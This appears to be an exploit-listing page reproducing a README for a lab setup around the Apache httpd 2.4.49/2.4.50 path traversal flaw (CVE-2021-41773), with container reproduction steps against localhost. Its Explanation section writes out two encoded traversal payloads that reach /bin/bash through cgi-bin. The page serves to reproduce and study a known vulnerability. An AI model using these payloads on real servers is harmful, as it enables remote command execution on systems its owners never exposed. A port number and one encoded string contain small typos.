Exploit for Path Traversal in Apache Http Server CVE-2021-41773

Name: Exploit for Path Traversal in Apache Http Server CVE-2021-41773
Rating: 5 (114 reviews)
2022-09-15 | CVSS 4.3
## https://sploitus.com/exploit?id=D10426F3-DF82-5439-AC3E-6CA0A1365A09
# Apache httpd RCE

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside these directories are not protected by default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was incomplete, see CVE-2021-42013.

- [CVE Details](https://www.cvedetails.com/cve/CVE-2021-41773/)
- [Source](https://packetstormsecurity.com/files/164418/Apache-HTTP-Server-2.4.49-Path-Traversal-Remote-Code-Execution.html)

## Affected Version(s)

- 2.4.49
- 2.4.50

## Fixed in Version(s)

- 2.4.51

## Prerequisities

- podman (or alias podman as docker)
- python3 and pip3
- colorama (python library install with `pip3 install colorama`)

## Files

- [httpd.conf](httpd.conf) the Default Apache configuration (with CGI module enabled)
- [hello.pl](hello.pl) an example hello-world `perl` CGI script running in the container(s)
- [main.py](main.py) an example exploit python script

## Reproduction

Start a vulnerable Apache httpd (with default configuration) as docker/podman container.

| Dockerfile     | Container      | Version |
|:--------------:|:--------------:|:-------:|
| Dockerfile2449 | vulnapache2449 | 2.4.49  |
| Dockerfile2450 | vulnapache2450 | 2.4.50  |

1. Build both container images
1.1 chmod +x ./build.sh
1.2 ./build.sh
2. Start vulnerable Apache httpd Containers
2.1 chmod +x ./run.sh
2.2 ./run.sh
3. verify webserver is running
3.1 `curl localhost:2449/cgi-bin/hello.pl`
3.2 `curl localhost:2450/cgi-bin/hello.pl`

| Container      | Listen Port |
|:--------------:|:-----------:|
| vulnapache2449 | 2449        |
| vulnapache2450 | 2450        |

1. run the exploit script
1.1 `python3 main.py localhost:4249`
1.2 select attack on version 2.4.49
1.3 `python3 main.py localhost:2450`
1.4 select attack on version 2.4.50

![Exploitation Example](exploitation-sample.png)

## Explanation

The Exploit will utilize Apache httpds CGI module to allow execution of arbitrary executables through path traversal.

- `/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash`
- `/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash`

`.%2e/` is url-encoded and equals to `../` if decoded.
`.%%32%658` is double url-encoded and equals also to `../` if decoded.

## Credits

- Exploit Author: Valentin Lobstein
- Software Link: https://github.com/Balgogan/CVE-2021-41773
- Lucas Schnell